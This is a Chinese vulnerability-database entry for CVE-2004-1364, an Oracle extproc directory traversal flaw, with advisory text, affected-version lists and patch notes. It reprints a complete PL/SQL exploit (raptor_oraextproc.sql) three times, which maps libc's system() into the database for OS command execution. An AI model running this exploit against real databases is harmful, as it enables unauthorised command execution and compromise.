CVE-2004-1364
CVSS8.5
发布时间 :2004-08-04 00:00:00
修订时间 :2016-10-17 22:53:32
NMCOEPS    

[原文]Directory traversal vulnerability in extproc in Oracle 9i and 10g allows remote attackers to access arbitrary libraries outside of the $ORACLE_HOME\bin directory.


[CNNVD]Oracle extproc目录遍历漏洞(CNNVD-200408-009)

        
        Oracle Database是一款商业性质大型数据库系统。
        Oracle 10g extproc存在目录遍历问题,远程攻击者可以利用这个漏洞绕过目录限制,访问其他库。
        extproc验证'$ORACLE_HOME\bin'目录中的库,这主要是为了保证外部库不能被装载,但是存在一个目录遍历问题,可导致攻击者绕过目录限制,访问如libc和msvcrt.dll库,通过调用system()函数可执行任意OS命令。
        

- CVSS (基础分值)

CVSS分值: 8.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-22 [对路径名的限制不恰当(路径遍历)]

- CPE (受影响的平台与产品)

cpe:/a:oracle:oracle10g:standard_10.1_.0.2
cpe:/a:oracle:oracle9i:client_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.0
cpe:/a:oracle:oracle9i:client_9.2.0.2
cpe:/a:oracle:oracle9i:standard_8.1.7
cpe:/a:oracle:oracle9i:standard_9.2
cpe:/a:oracle:oracle9i:standard_9.2.0.2
cpe:/a:oracle:oracle9i:standard_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.2.0.4
cpe:/a:oracle:oracle9i:standard_9.2.0.3
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.0.0
cpe:/a:oracle:oracle8i:standard_8.0.6_.3
cpe:/a:oracle:oracle10g:standard_9.0.4_.0
cpe:/a:oracle:oracle9i:standard_9.2.0.5
cpe:/a:oracle:application_serverOracle Application Server
cpe:/a:oracle:enterprise_manager:9.0.1Oracle Enterprise Manager 9.0.1
cpe:/a:oracle:enterprise_manager_grid_control:10.1.0.2Oracle Enterprise Manager Grid Control 10g 10.1.0.2
cpe:/a:oracle:oracle8i:enterprise_8.0.6_.0.1
cpe:/a:oracle:oracle9i:enterprise_9.0.1
cpe:/a:oracle:oracle9i:enterprise_9.2.0
cpe:/a:oracle:application_server:9.0.4Oracle Oracle10g Application Server 9.0.4
cpe:/a:oracle:application_server:9.0.3Oracle Oracle9i Application Server 9.0.3
cpe:/a:oracle:application_server:9.0.3.1Oracle Application Server 10g 9.0.3.1
cpe:/a:oracle:oracle8i:standard_8.0.6
cpe:/a:oracle:oracle8i:enterprise_8.0.5_.0.0
cpe:/a:oracle:application_server:9.0.2.0.1Oracle Oracle9i Application Server 9.0.2.0.1
cpe:/a:oracle:application_server:9.0.2.0.0Oracle Oracle9i Application Server 9.0.2.0.0
cpe:/a:oracle:oracle10g:enterprise_9.0.4_.0
cpe:/a:oracle:oracle9i:standard_9.0.1.3
cpe:/a:oracle:oracle9i:standard_9.0.1.2
cpe:/a:oracle:oracle9i:standard_9.0.1.5
cpe:/a:oracle:oracle9i:standard_9.0.1.4
cpe:/a:oracle:e-business_suite:11.5.4Oracle E-Business Suite 11i 11.5.4
cpe:/a:oracle:e-business_suite:11.5.6Oracle E-Business Suite 11i 11.5.6
cpe:/a:oracle:oracle9i:personal_9.0.1
cpe:/a:oracle:e-business_suite:11.5.3Oracle E-Business Suite 11i 11.5.3
cpe:/a:oracle:collaboration_suite:release_1
cpe:/a:oracle:oracle10g:personal_9.0.4_.0
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.0.2
cpe:/a:oracle:oracle8i:standard_8.1.7_.0.0
cpe:/a:oracle:oracle9i:personal_8.1.7
cpe:/a:oracle:oracle8i:enterprise_8.1.6_.1.0
cpe:/a:oracle:oracle9i:personal_9.2.0.4
cpe:/a:oracle:oracle9i:personal_9.2.0.5
cpe:/a:oracle:oracle9i:personal_9.2.0.2
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.0.0
cpe:/a:oracle:oracle9i:personal_9.2.0.3
cpe:/a:oracle:e-business_suite:11.5.1Oracle E-Business Suite 11i 11.5.1
cpe:/a:oracle:oracle9i:enterprise_9.0.1.4
cpe:/a:oracle:oracle9i:enterprise_9.0.1.5
cpe:/a:oracle:oracle9i:enterprise_8.1.7
cpe:/a:oracle:e-business_suite:11.5.5Oracle E-Business Suite 11i 11.5.5
cpe:/a:oracle:e-business_suite:11.5.2Oracle E-Business Suite 11i 11.5.2
cpe:/a:oracle:e-business_suite:11.5.9Oracle E-Business Suite 11i 11.5.9
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.1.0
cpe:/a:oracle:enterprise_manager_database_control:10.1.2Oracle Enterprise Manager Database Control 10g 10.1.2
cpe:/a:oracle:e-business_suite:11.5.8Oracle E-Business Suite 11i 11.5.8
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.4
cpe:/a:oracle:e-business_suite:11.5.7Oracle E-Business Suite 11i 11.5.7
cpe:/a:oracle:oracle8i:standard_8.1.7_.1
cpe:/a:oracle:oracle8i:standard_8.1.7_.4
cpe:/a:oracle:oracle9i:standard_9.0.2
cpe:/a:oracle:oracle9i:personal_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.0.1
cpe:/a:oracle:enterprise_manager:9Oracle Enterprise Manager 9.0i
cpe:/a:oracle:application_server:9.0.2.1Oracle Oracle10g Application Server 9.0.2.1
cpe:/a:oracle:application_server:9.0.2.2Oracle Oracle9i Application Server 9.0.2.2
cpe:/a:oracle:application_server:9.0.4.0Oracle Oracle10g Application Server 9.0.4.0
cpe:/a:oracle:oracle10g:enterprise_10.1.0.2
cpe:/a:oracle:oracle8i:standard_8.1.7
cpe:/a:oracle:application_server:9.0.2.3Oracle Application Server 10g 9.0.2.3
cpe:/a:oracle:application_server:9.0.4.1Oracle Application Server 10g 9.0.4.1
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.1.0
cpe:/a:oracle:oracle8i:standard_8.1.5
cpe:/a:oracle:oracle9i:enterprise_9.2.0.5
cpe:/a:oracle:oracle9i:enterprise_9.2.0.1
cpe:/a:oracle:oracle9i:enterprise_9.2.0.2
cpe:/a:oracle:oracle9i:enterprise_9.2.0.3
cpe:/a:oracle:oracle9i:enterprise_9.2.0.4
cpe:/a:oracle:oracle9i:personal_9.2
cpe:/a:oracle:oracle8i:standard_8.1.6
cpe:/a:oracle:oracle8i:enterprise_8.0.6_.0.0
cpe:/a:oracle:oracle8i:enterprise_8.1.6_.0.0
cpe:/a:oracle:oracle9i:personal_9.0.1.5
cpe:/a:oracle:application_server:9.0.2Oracle Application Server 9i 9.0.2
cpe:/a:oracle:oracle10g:personal_10.1_.0.2
cpe:/a:oracle:oracle9i:personal_9.0.1.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1364
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1364
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-009
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110382406002365&w=2
(UNKNOWN)  BUGTRAQ  20041223 Oracle extproc directory traversal (#NISR23122004B)
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101782-1
(UNKNOWN)  SUNALERT  101782
http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql
(UNKNOWN)  MISC  http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql
http://www.kb.cert.org/vuls/id/316206
(UNKNOWN)  CERT-VN  VU#316206
http://www.ngssoftware.com/advisories/oracle23122004B.txt
(VENDOR_ADVISORY)  MISC  http://www.ngssoftware.com/advisories/oracle23122004B.txt
http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf
(VENDOR_ADVISORY)  CONFIRM  http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf
http://www.securityfocus.com/archive/1/archive/1/454861/100/0/threaded
(UNKNOWN)  BUGTRAQ  20061219 Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit
http://www.securityfocus.com/bid/10871
(PATCH)  BID  10871
http://www.us-cert.gov/cas/techalerts/TA04-245A.html
(VENDOR_ADVISORY)  CERT  TA04-245A
http://xforce.iss.net/xforce/xfdb/18658
(PATCH)  XF  oracle-extproc-directory-traversal(18658)

- 漏洞信息

Oracle extproc目录遍历漏洞
高危 未知
2004-08-04 00:00:00 2006-08-30 00:00:00
远程  
        
        Oracle Database是一款商业性质大型数据库系统。
        Oracle 10g extproc存在目录遍历问题,远程攻击者可以利用这个漏洞绕过目录限制,访问其他库。
        extproc验证'$ORACLE_HOME\bin'目录中的库,这主要是为了保证外部库不能被装载,但是存在一个目录遍历问题,可导致攻击者绕过目录限制,访问如libc和msvcrt.dll库,通过调用system()函数可执行任意OS命令。
        

- 公告与补丁

        厂商补丁:
        Oracle
        ------
        ORACLE已经发布patch (#68)来修正此漏洞:
        
        http://metalink.oracle.com/

- 漏洞信息 (2951)

Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit (EDBID:2951)
multiple remote
2006-12-19 Verified
0 Marco Ivaldi
N/A [点击下载]
--
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
--
-- Directory traversal vulnerability in extproc in Oracle 9i and 10g 
-- allows remote attackers to access arbitrary libraries outside of the 
-- $ORACLE_HOME\bin directory (CVE-2004-1364).
--
-- This PL/SQL code exploits the Oracle extproc directory traversal bug
-- to remotely execute arbitrary OS commands with the privileges of the DBMS 
-- user (the CREATE [ANY] LIBRARY privilege is needed).
--
-- See also: 
-- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql
--
-- Vulnerable platforms:
-- Oracle 9i (all versions?)
-- Oracle 10g versions prior to 10.1.0.3
--
-- Tested on Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production,
-- running on both Solaris 9 and 10 systems. It will need some tweakings to 
-- properly work on other platforms.
--
-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
	procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
	procedure exec(cmdstring in char)
	is external
	name "system"
	library exec_shell32
	language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
	procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
	procedure exec(cmdstring in char)
	is external
	name "system"
	library exec_shell64
	language c;
end oracmd64;
/

-- milw0rm.com [2006-12-19]
		

- 漏洞信息 (24353)

Oracle 9i Multiple Unspecified Vulnerabilities (EDBID:24353)
unix remote
2004-08-04 Verified
0 Marco Ivaldi
N/A [点击下载]
source: http://www.securityfocus.com/bid/10871/info

Reportedly, multiple unspecified Oracle products contain multiple unspecified vulnerabilities. 

The reported vulnerabilities include SQL-injection issues, buffer-overflow issues, and others. 

There have also been reports that issues covered in this BID and resolved in the referenced Oracle patch include trigger-abuse issues, character-set-conversion bugs, and denial-of-service vulnerabilities. More information is pending. 

Note that a number of unsupported versions of affected products may also potentially be vulnerable.

--
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
--
-- Directory traversal vulnerability in extproc in Oracle 9i and 10g 
-- allows remote attackers to access arbitrary libraries outside of the 
-- $ORACLE_HOME\bin directory (CVE-2004-1364).
--
-- This PL/SQL code exploits the Oracle extproc directory traversal bug
-- to remotely execute arbitrary OS commands with the privileges of the DBMS 
-- user (the CREATE [ANY] LIBRARY privilege is needed).
--
-- See also: 
-- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql
--
-- Vulnerable platforms:
-- Oracle 9i (all versions?)
-- Oracle 10g versions prior to 10.1.0.3
--
-- Tested on Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production,
-- running on both Solaris 9 and 10 systems. It will need some tweakings to 
-- properly work on other platforms.
--
-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
	procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
	procedure exec(cmdstring in char)
	is external
	name "system"
	library exec_shell32
	language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
	procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
	procedure exec(cmdstring in char)
	is external
	name "system"
	library exec_shell64
	language c;
end oracmd64;
/

-- milw0rm.com [2006-12-19]		

- 漏洞信息 (F53183)

raptor_oraextproc.sql.txt (PacketStormID:F53183)
2006-12-22 00:00:00
Marco Ivaldi  
exploit,arbitrary
CVE-2004-1364
[点击下载]

This PL/SQL code exploits the Oracle extproc directory traversal bug to remotely execute arbitrary OS commands with the privileges of the DBMS user. All versions of Oracle 9i are susceptible. Oracle 10g versions prior to 10.1.0.3 are susceptible.

-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
--
-- Directory traversal vulnerability in extproc in Oracle 9i and 10g 
-- allows remote attackers to access arbitrary libraries outside of the 
-- $ORACLE_HOME\bin directory (CVE-2004-1364).
--
-- This PL/SQL code exploits the Oracle extproc directory traversal bug
-- to remotely execute arbitrary OS commands with the privileges of the DBMS 
-- user (the CREATE [ANY] LIBRARY privilege is needed).
--
-- See also: 
-- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql
--
-- Vulnerable platforms:
-- Oracle 9i (all versions?)
-- Oracle 10g versions prior to 10.1.0.3
--
-- Tested on Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production,
-- running on both Solaris 9 and 10 systems. It will need some tweakings to 
-- properly work on other platforms.
--
-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
	procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
	procedure exec(cmdstring in char)
	is external
	name "system"
	library exec_shell32
	language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
	procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
	procedure exec(cmdstring in char)
	is external
	name "system"
	library exec_shell64
	language c;
end oracmd64;
/
    

- 漏洞信息

12744
Oracle extproc Function Traversal Arbitrary Library Access
Input Manipulation
Vendor Verified

- 漏洞描述

- 时间线

2004-12-23 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Oracle Multiple Unspecified Vulnerabilities
Unknown 10871
Yes No
2004-08-04 12:00:00 2006-12-19 06:37:00
David Litchfield, Michael Litchfield, Cesar Cerrudo, Esteban Martinez Fayo, Pete Finnigan, Jonathan Gennick, Alexander Kornbrust, Stephen Kost, Matt Moore, Aaron Newman, Andy Rees, and Christian Schaller, are credited for the discovery of these vulnerabili

- 受影响的程序版本

Sun SunMC 3.5 update 1a
Sun SunMC 3.5 update 1
Oracle Oracle9i Standard Edition 9.2 .3
Oracle Oracle9i Standard Edition 9.2 .0.5
Oracle Oracle9i Standard Edition 9.2 .0.3
Oracle Oracle9i Standard Edition 9.2 .0.2
Oracle Oracle9i Standard Edition 9.2 .0.1
Oracle Oracle9i Standard Edition 9.2
Oracle Oracle9i Standard Edition 9.0.2
Oracle Oracle9i Standard Edition 9.0.1 .5
Oracle Oracle9i Standard Edition 9.0.1 .4
Oracle Oracle9i Standard Edition 9.0.1 .3
Oracle Oracle9i Standard Edition 9.0.1 .2
Oracle Oracle9i Standard Edition 9.0.1
Oracle Oracle9i Standard Edition 9.0 .2.4
Oracle Oracle9i Standard Edition 9.0
Oracle Oracle9i Standard Edition 8.1.7
Oracle Oracle9i Personal Edition 9.2 .0.5
Oracle Oracle9i Personal Edition 9.2 .0.3
Oracle Oracle9i Personal Edition 9.2 .0.2
Oracle Oracle9i Personal Edition 9.2 .0.1
Oracle Oracle9i Personal Edition 9.2
Oracle Oracle9i Personal Edition 9.0.1 .5
Oracle Oracle9i Personal Edition 9.0.1 .4
Oracle Oracle9i Personal Edition 9.0.1
Oracle Oracle9i Personal Edition 9.0 .2.4
Oracle Oracle9i Personal Edition 8.1.7
Oracle Oracle9i Lite 5.0 .2.9.0
Oracle Oracle9i Lite 5.0 .2.0.0
Oracle Oracle9i Lite 5.0 .1.0.0
Oracle Oracle9i Lite 5.0 .0.0.0
Oracle Oracle9i Enterprise Edition 9.2 .2
Oracle Oracle9i Enterprise Edition 9.2 .0.5
Oracle Oracle9i Enterprise Edition 9.2 .0.3
Oracle Oracle9i Enterprise Edition 9.2 .0.1
Oracle Oracle9i Enterprise Edition 9.2 .0
Oracle Oracle9i Enterprise Edition 9.0.1 .5
Oracle Oracle9i Enterprise Edition 9.0.1 .4
Oracle Oracle9i Enterprise Edition 9.0.1
Oracle Oracle9i Enterprise Edition 9.0 .2.4
Oracle Oracle9i Enterprise Edition 8.1.7
Oracle Oracle9i Client Edition 9.2 .0.2
Oracle Oracle9i Client Edition 9.2 .0.1
Oracle Oracle9i Application Server Web Cache 9.0.3 .1
Oracle Oracle9i Application Server Web Cache 9.0.2 .3
Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+ Oracle iStore 11i 11i.IBE.O
Oracle Oracle9i Application Server Reports 9.0.2 .1
Oracle Oracle9i Application Server Reports 9.0.2
Oracle Oracle9i Application Server Portal 9.0.2 .3B
Oracle Oracle9i Application Server Portal 9.0.2 .3A
+ Oracle Oracle9i Application Server 9.0.2 .2
Oracle Oracle9i Application Server Portal 9.0.2 .3
Oracle Oracle9i Application Server 9.0.3 .1
Oracle Oracle9i Application Server 9.0.3
Oracle Oracle9i Application Server 9.0.2 .3
Oracle Oracle9i Application Server 9.0.2 .2
Oracle Oracle9i Application Server 9.0.2 .1
Oracle Oracle9i Application Server 9.0.2 .0.1
Oracle Oracle9i Application Server 9.0.2 .0.0
Oracle Oracle9i Application Server 9.0.2
Oracle Oracle9i Application Server
Oracle Oracle8i Standard Edition 8.1.7 .4
Oracle Oracle8i Standard Edition 8.1.7 .1
Oracle Oracle8i Standard Edition 8.1.7 .0.0
Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle8i Standard Edition 8.1.6
Oracle Oracle8i Standard Edition 8.1.5
Oracle Oracle8i Standard Edition 8.0.6 .3
Oracle Oracle8i Standard Edition 8.0.6
Oracle Oracle8i Enterprise Edition 8.1.7 .4.0
Oracle Oracle8i Enterprise Edition 8.1.7 .1.0
Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
Oracle Oracle8i Enterprise Edition 8.1.6 .1.0
Oracle Oracle8i Enterprise Edition 8.1.6 .0.0
Oracle Oracle8i Enterprise Edition 8.1.5 .1.0
Oracle Oracle8i Enterprise Edition 8.1.5 .0.2
Oracle Oracle8i Enterprise Edition 8.1.5 .0.0
Oracle Oracle8i Enterprise Edition 8.0.6 .0.1
Oracle Oracle8i Enterprise Edition 8.0.6 .0.0
Oracle Oracle8i Enterprise Edition 8.0.5 .0.0
Oracle Oracle8 8.1.7
- Microsoft Windows 2000 Professional
Oracle Oracle8 8.1.6
Oracle Oracle8 8.1.5
Oracle Oracle8 8.0.6
Oracle Oracle8 8.0.5 .1
Oracle Oracle8 8.0.5
- SGI IRIX 6.5.4
Oracle Oracle8 8.0.4
Oracle Oracle8 8.0.3
Oracle Oracle8 8.0.2
Oracle Oracle8 8.0.1
- HP HP-UX 11.0
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
Oracle Oracle10g Standard Edition 10.1 .0.2
Oracle Oracle10g Standard Edition 9.0.4 .0
Oracle Oracle10g Personal Edition 10.1 .0.2
Oracle Oracle10g Personal Edition 9.0.4 .0
Oracle Oracle10g Enterprise Edition 10.1 .0.2
Oracle Oracle10g Enterprise Edition 9.0.4 .0
Oracle Oracle10g Application Server 10.1 .0.2
Oracle Oracle10g Application Server 9.0.4 .0
Oracle Oracle HTTP Server 9.2 .0
+ Apache Software Foundation Apache 1.3.22
Oracle Oracle HTTP Server 9.0.1
Oracle Oracle HTTP Server 8.1.7
+ Apache Software Foundation Apache 1.3.12
+ Oracle Oracle8 8.1.7
+ Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
+ Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle 9i Application Server Release 1 1.0.2 .2
Oracle listener 8.1.6
Oracle listener 8.0.6
Oracle Label Security 9.0.1
+ Oracle Oracle9i Standard Edition 9.0.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Oracle Label Security 8.1.7
Oracle iStore 11i 11i.IBE.O
Oracle Files 9.0.3 .3.6
Oracle Files 9.0.3 .3.0
+ Oracle Collaboration Suite Release 1
Oracle Files 9.0.3 .2.0
+ Oracle Collaboration Suite Release 1
Oracle Files 9.0.3 .1.0
+ Oracle Collaboration Suite Release 1
Oracle Enterprise Manager Grid Control 10g 10.1 .0.2
Oracle Enterprise Manager Database Control 10g 10.1 .0.2
Oracle Enterprise Manager 9.0.1
Oracle Enterprise Manager 9.0 i
Oracle E-Business Suite 11i 11.8
Oracle E-Business Suite 11i 11.7
Oracle E-Business Suite 11i 11.6
Oracle E-Business Suite 11i 11.5.9
Oracle E-Business Suite 11i 11.5.8
Oracle E-Business Suite 11i 11.5.7
Oracle E-Business Suite 11i 11.5.6
Oracle E-Business Suite 11i 11.5.5
Oracle E-Business Suite 11i 11.5.4
Oracle E-Business Suite 11i 11.5.3
Oracle E-Business Suite 11i 11.5.2
Oracle E-Business Suite 11i 11.5.1
Oracle E-Business Suite 11i 11.5
Oracle E-Business Suite 11i 11.4
Oracle E-Business Suite 11i 11.3
Oracle E-Business Suite 11i 11.2
Oracle E-Business Suite 11i 11.1
Oracle E-Business Suite 11.0
Oracle E-Business Suite 10.7
Oracle Configurator 11.0 i
Oracle Collaboration Suite Release 1
Oracle Applications 11.0
Oracle Applications 10.7
Oracle Application Server Web Cache 10g 9.0.4 .0
+ Oracle Oracle10g Application Server 9.0.4 .0
Oracle Application Server 10g 9.0.4 .1
Oracle Application Server 10g 9.0.4

- 漏洞讨论

Reportedly, multiple unspecified Oracle products contain multiple unspecified vulnerabilities.

The reported vulnerabilities include SQL-injection issues, buffer-overflow issues, and others.

There have also been reports that issues covered in this BID and resolved in the referenced Oracle patch include trigger-abuse issues, character-set-conversion bugs, and denial-of-service vulnerabilities. More information is pending.

Note that a number of unsupported versions of affected products may also potentially be vulnerable.

- 漏洞利用

Private exploits reportedly exist for many of these vulnerabilities.

The following exploit demonstrates CVE-2004-1364, the directory-traversal vulnerability in 'extproc':

- 解决方案

Oracle has released an alert (#68) and a patch to address these issues.

NOTE: A message from David Litchfield <davidl@ngssoftware.com> states that some of the vulnerabilities in alert #68 may not have been successfully fixed by Oracle. Users of affected packages should refer to the referenced message and contact their vendor for further information on the status of fixes.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站